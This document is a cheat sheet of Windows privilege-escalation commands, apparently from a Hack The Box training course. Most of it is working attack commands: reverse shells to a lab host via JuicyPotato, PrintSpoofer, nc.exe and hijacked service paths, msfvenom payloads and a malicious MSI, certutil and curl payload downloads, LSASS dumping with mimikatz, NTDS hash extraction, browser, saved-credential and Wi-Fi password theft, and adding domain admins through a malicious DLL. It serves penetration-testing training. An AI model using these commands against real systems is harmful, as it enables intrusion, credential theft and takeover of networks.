Windows Privilege Escalation

Initial Enumeration

Command	Description
`xfreerdp /v:<target ip> /u:htb-student`	RDP to lab target
`ipconfig /all`	Get interface, IP address and DNS information
`arp -a`	Review ARP table
`route print`	Review routing table
`Get-MpComputerStatus`	Check Windows Defender status
`Get-AppLockerPolicy -Effective \| select -ExpandProperty RuleCollections`	List AppLocker rules
`Get-AppLockerPolicy -Local \| Test-AppLockerPolicy -path C:\Windows\System32\cmd.exe -User Everyone`	Test AppLocker policy
`set`	Display all environment variables
`systeminfo`	View detailed system configuration information
`wmic qfe`	Get patches and updates
`wmic product get name`	Get installed programs
`tasklist /svc`	Display running processes
`query user`	Get logged-in users
`echo %USERNAME%`	Get current user
`whoami /priv`	View current user privileges
`whoami /groups`	View current user group information
`net user`	Get all system users
`net localgroup`	Get all system groups
`net localgroup administrators`	View details about a group
`net accounts`	Get passsword policy
`netstat -ano`	Display active network connections
`pipelist.exe /accepteula`	List named pipes
`gci \\.\pipe\`	List named pipes with PowerShell
`accesschk.exe /accepteula \\.\Pipe\lsass -v`	Review permissions on a named pipe

Handy Commands

Command	Description
`mssqlclient.py [email protected] -windows-auth`	Connect using mssqlclient.py
`enable_xp_cmdshell`	Enable xp_cmdshell with mssqlclient.py
`xp_cmdshell whoami`	Run OS commands with xp_cmdshell
`c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 443 -e cmd.exe" -t *`	Escalate privileges with JuicyPotato
`c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"`	Escalating privileges with PrintSpoofer
`procdump.exe -accepteula -ma lsass.exe lsass.dmp`	Take memory dump with ProcDump
`sekurlsa::minidump lsass.dmp` and `sekurlsa::logonpasswords`	Use MimiKatz to extract credentials from LSASS memory dump
`dir /q C:\backups\wwwroot\web.config`	Checking ownership of a file
`takeown /f C:\backups\wwwroot\web.config`	Taking ownership of a file
`Get-ChildItem -Path ‘C:\backups\wwwroot\web.config’ \| select name,directory, @{Name=”Owner”;Expression={(Get-ACL $_.Fullname).Owner}}`	Confirming changed ownership of a file
`icacls “C:\backups\wwwroot\web.config” /grant htb-student:F`	Modifying a file ACL
`secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL`	Extract hashes with secretsdump.py
`robocopy /B E:\Windows\NTDS .\ntds ntds.dit`	Copy files with ROBOCOPY
`wevtutil qe Security /rd:true /f:text \| Select-String "/user"`	Searching security event logs
`wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 \| findstr "/user"`	Passing credentials to wevtutil
`Get-WinEvent -LogName security \| where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '/user' } \| Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}`	Searching event logs with PowerShell
`msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll`	Generate malicious DLL
`dnscmd.exe /config /serverlevelplugindll adduser.dll`	Loading a custom DLL with dnscmd
`wmic useraccount where name="netadm" get sid`	Finding a user's SID
`sc.exe sdshow DNS`	Checking permissions on DNS service
`sc stop dns`	Stopping a service
`sc start dns`	Starting a service
`reg query \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters`	Querying a registry key
`reg delete \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll`	Deleting a registry key
`sc query dns`	Checking a service status
`Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local`	Disabling the global query block list
`Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3`	Adding a WPAD record
`cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp`	Compile with cl.exe
`reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"`	Add reference to a driver (1)
`reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1`	Add reference to a driver (2)
`.\DriverView.exe /stext drivers.txt` and `cat drivers.txt \| Select-String -pattern Capcom`	Check if driver is loaded
`EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys`	Using EopLoadDriver
`c:\Tools\PsService.exe security AppReadiness`	Checking service permissions with PsService
`sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"`	Modifying a service binary path
`REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA`	Confirming UAC is enabled
`REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin`	Checking UAC level
`[environment]::OSVersion.Version`	Checking Windows version
`cmd /c echo %PATH%`	Reviewing path variable
`curl http://10.10.14.3:8080/srrstr.dll -O "C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll"`	Downloading file with cURL in PowerShell
`rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll`	Executing custom dll with rundll32.exe
`.\SharpUp.exe audit`	Running SharpUp
`icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"`	Checking service permissions with icacls
`cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"`	Replace a service binary
`wmic service get name,displayname,pathname,startmode \| findstr /i "auto" \| findstr /i /v "c:\windows\\" \| findstr /i /v """`	Searching for unquoted service paths
`accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services`	Checking for weak service ACLs in the Registry
`Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"`	Changing ImagePath with PowerShell
`Get-CimInstance Win32_StartupCommand \| select Name, command, Location, User \| fl`	Check startup programs
`msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.3 LPORT=8443 -f exe > maintenanceservice.exe`	Generating a malicious binary
`get-process -Id 3324`	Enumerating a process ID with PowerShell
`get-service \| ? {$_.DisplayName -like 'Druva*'}`	Enumerate a running service by name with PowerShell

Credential Theft

Command	Description
`findstr /SIM /C:"password" .txt .ini .cfg .config *.xml`	Search for files with the phrase "password"
`gc 'C:\Users\htb-student\AppData\Local\Google\Chrome\User Data\Default\Custom Dictionary.txt' \| Select-String password`	Searching for passwords in Chrome dictionary files
`(Get-PSReadLineOption).HistorySavePath`	Confirm PowerShell history save path
`gc (Get-PSReadLineOption).HistorySavePath`	Reading PowerShell history file
`$credential = Import-Clixml -Path 'C:\scripts\pass.xml'`	Decrypting PowerShell credentials
`cd c:\Users\htb-student\Documents & findstr /SI /M "password" .xml .ini *.txt`	Searching file contents for a string
`findstr /si password .xml .ini .txt .config`	Searching file contents for a string
`findstr /spin "password" .`	Searching file contents for a string
`select-string -Path C:\Users\htb-student\Documents\*.txt -Pattern password`	Search file contents with PowerShell
`dir /S /B pass.txt == pass.xml == pass.ini == cred == vnc == .config`	Search for file extensions
`where /R C:\ *.config`	Search for file extensions
`Get-ChildItem C:\ -Recurse -Include .rdp, .config, .vnc, .cred -ErrorAction Ignore`	Search for file extensions using PowerShell
`cmdkey /list`	List saved credentials
`.\SharpChrome.exe logins /unprotect`	Retrieve saved Chrome credentials
`.\lazagne.exe -h`	View LaZagne help menu
`.\lazagne.exe all`	Run all LaZagne modules
`Invoke-SessionGopher -Target WINLPE-SRV01`	Running SessionGopher
`netsh wlan show profile`	View saved wireless networks
`netsh wlan show profile ilfreight_corp key=clear`	Retrieve saved wireless passwords

Other Commands

Command	Description
`certutil.exe -urlcache -split -f http://10.10.14.3:8080/shell.bat shell.bat`	Transfer file with certutil
`certutil -encode file1 encodedfile`	Encode file with certutil
`certutil -decode encodedfile file2`	Decode file with certutil
`reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer`	Query for always install elevated registry key (1)
`reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer`	Query for always install elevated registry key (2)
`msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi`	Generate a malicious MSI package
`msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart`	Executing an MSI package from command line
`schtasks /query /fo LIST /v`	Enumerate scheduled tasks
`Get-ScheduledTask \| select TaskName,State`	Enumerate scheduled tasks with PowerShell
`.\accesschk64.exe /accepteula -s -d C:\Scripts\`	Check permissions on a directory
`Get-LocalUser`	Check local user description field
`Get-WmiObject -Class Win32_OperatingSystem \| select Description`	Enumerate computer description field
`guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmd`	Mount VMDK on Linux
`guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1`	Mount VHD/VHDX on Linux
`sudo python2.7 windows-exploit-suggester.py --update`	Update Windows Exploit Suggester database
`python2.7 windows-exploit-suggester.py --database 2021-05-13-mssb.xls --systeminfo win7lpe-systeminfo.txt`	Running Windows Exploit Suggester